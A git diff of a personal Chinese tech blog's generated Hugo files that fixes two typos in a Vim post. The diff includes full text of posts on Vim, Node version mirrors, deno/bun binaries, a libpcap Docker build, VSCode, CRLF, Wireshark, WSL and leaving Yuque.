diff --git a/categories/all/index.html b/categories/all/index.html
index 16f0f7efa..2973a8d05 100644
--- a/categories/all/index.html
+++ b/categories/all/index.html
@@ -3,7 +3,7 @@
 因为错误提示只有一行,所以无法上下移动。
 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。
 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。
-我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。
+我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会遇到很多困难。 这些困难会给人造成极大的挫折感。
 能解决困难,则学到东西。
 否则就只能放弃VIM, 回到VScode的怀抱中。
 但是,我已经习惯了不使用鼠标的快捷编辑方式。
diff --git a/categories/all/index.xml b/categories/all/index.xml
index caf7c0ceb..8b3cb1da8 100644
--- a/categories/all/index.xml
+++ b/categories/all/index.xml
@@ -21,7 +21,7 @@
 因为错误提示只有一行,所以无法上下移动。
 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。
 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。
-我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。
+我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会遇到很多困难。 这些困难会给人造成极大的挫折感。
 能解决困难,则学到东西。
 否则就只能放弃VIM, 回到VScode的怀抱中。
 但是,我已经习惯了不使用鼠标的快捷编辑方式。
diff --git a/index.html b/index.html
index d078aa27d..837cd33e5 100644
--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 因为错误提示只有一行,所以无法上下移动。
 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。
 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。
-我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。
+我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会遇到很多困难。 这些困难会给人造成极大的挫折感。
 能解决困难,则学到东西。
 否则就只能放弃VIM, 回到VScode的怀抱中。
 但是,我已经习惯了不使用鼠标的快捷编辑方式。
diff --git a/index.json b/index.json
index dd0843ea3..a0dfe4642 100644
--- a/index.json
+++ b/index.json
@@ -1 +1 @@
-[{"content":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上线移动。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 
并且接受VIM的所有挑战。\n","permalink":"https://wdd.js.org/vim/stuck-in-error-msgfloat-window/","summary":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上线移动。 我的光标被困在了错误提示框中。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 并且接受VIM的所有挑战。","title":"困在coc错误弹窗中"},{"content":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次到看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了如何配置跳换的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包的里面的类型定义,非常好用。\n亲测有效。\n","permalink":"https://wdd.js.org/vim/typescript-go-to-definition/","summary":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次到看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了如何配置跳换的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包的里面的类型定义,非常好用。\n亲测有效。","title":"VIM typescript 跳转到定义"},{"content":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.4, 
我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表现象上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmirrror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功的从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771\n","permalink":"https://wdd.js.org/posts/2023/n-stucked/","summary":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.4, 我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表现象上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmirrror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功的从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771","title":"安装NodeJS, N命令似乎卡住了"},{"content":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后来新秀,如deno, 还有最近表火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 
看起来是有有点复杂,光一个构建就写了七八步。\n所以今天只比较一些deno和bun的构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26b字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的翻倍: 1804415 deno构建的可执行文件相比bun翻倍:1.7 参考 https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","permalink":"https://wdd.js.org/posts/2023/js-runtime-build-executable/","summary":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后来新秀,如deno, 还有最近表火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 看起来是有有点复杂,光一个构建就写了七八步。\n所以今天只比较一些deno和bun的构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26b字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的翻倍: 1804415 deno构建的可执行文件相比bun翻倍:1.7 参考 https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","title":"JS运行时构建独立二进制程序比较"},{"content":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . 
FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct # 设置工作目录 WORKDIR /app # 拷贝go相关的依赖 COPY go.mod go.sum ./ # 下载go相关的依赖 RUN go mod download # 复制go代码 COPY . . # 编译go代码 RUN CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -a --ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; -o run main.go # 使用最小的scratch镜像 FROM scratch # 设置工作目录 WORKDIR /app # 拷贝二进制文件 COPY --from=builder /app/run . EXPOSE 8086 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 整个Dockerfile比较好理解,重要的部分就是ldflags的参数了,下面着重讲解一下\n--ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; 这个 go build 命令包含以下参数:\n-a:强制重新编译所有的包,即使它们已经是最新的。这个选项通常用于强制更新依赖包或者重建整个程序。 --ldflags:设置链接器选项,这个选项后面的参数会被传递给链接器。 -linkmode external:指定链接模式为 external,即使用外部链接器。 -extldflags \u0026quot;-static -s -w\u0026quot;:传递给外部链接器的选项,其中包含了 -static(强制使用静态链接)、-s(禁止符号表和调试信息生成)和 -w(禁止 DWARF 调试信息生成)三个选项。 这个命令的目的是生成一个静态链接的可执行文件,其中所有的依赖包都被链接进了最终的二进制文件中,这样可以保证可执行文件的可移植性和兼容性,同时也可以减小文件大小。这个命令的缺点是编译时间较长,特别是在包数量较多的情况下,因为它需要重新编译所有的包,即使它们已经是最新的。\n","permalink":"https://wdd.js.org/golang/build-docker-image-with-libpcap/","summary":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . 
RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.","title":"Build Docker Image With Libpcap"},{"content":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢\n","permalink":"https://wdd.js.org/posts/2023/vscode-highlight-tab/","summary":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢","title":"VScode激活Tab更容易区分"},{"content":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 
可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix? # 可以把windows文件类型转为unix dos2unix file 如果是vscode,也可以点击对应的文件格式按钮。\n如何解决这些问题? 最好的方案,是我们把代码编辑器, 设置eol为\\n, 从源头解决这个问题。\n以vscode为例子:\nTip vscode的eol配置,只对新文件生效 如果文件本来就是CRLF, 需要先转成LF, eol才会生效 ","permalink":"https://wdd.js.org/posts/2023/tips-about-cr-lf/","summary":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? 
shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix?","title":"行位结束符引起的问题"},{"content":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂在目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给他 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 ","permalink":"https://wdd.js.org/posts/2022/12/nuc11-deepin-20-2/","summary":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂在目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给他 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 ","title":"NUC11 安装 Deepin 20.2.4"},{"content":"0. 前提条件 wireshark 4.0.2 1. 时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个包UDP包上点击右键,出现如下弹框,选择Decode As\n再当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp\n","permalink":"https://wdd.js.org/posts/2022/12/wireshark-101/","summary":"0. 前提条件 wireshark 4.0.2 1. 
时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个包UDP包上点击右键,出现如下弹框,选择Decode As\n再当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp","title":"Wireshark 使用技巧"},{"content":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一边之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统已经很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后再Windows应用商店重新安装这个应用 Windows的升级之后,可能Windows Linux子系统组建也更新了某些了内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。\n","permalink":"https://wdd.js.org/posts/2022/12/wsl-error-0x80040154-after-windows-update/","summary":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一边之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统已经很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后再Windows应用商店重新安装这个应用 Windows的升级之后,可能Windows Linux子系统组建也更新了某些了内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。","title":"Windows更新之后 Linux报错 Error 0x80040154"},{"content":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。\n","permalink":"https://wdd.js.org/posts/2022/12/double-click-close-tab/","summary":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。","title":"Edge浏览器双击标签栏 
关闭标签页"},{"content":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 ","permalink":"https://wdd.js.org/posts/2022/12/why-i-dont-not-use-yuque-any-more/","summary":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 ","title":"为什么我不再使用语雀"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? 
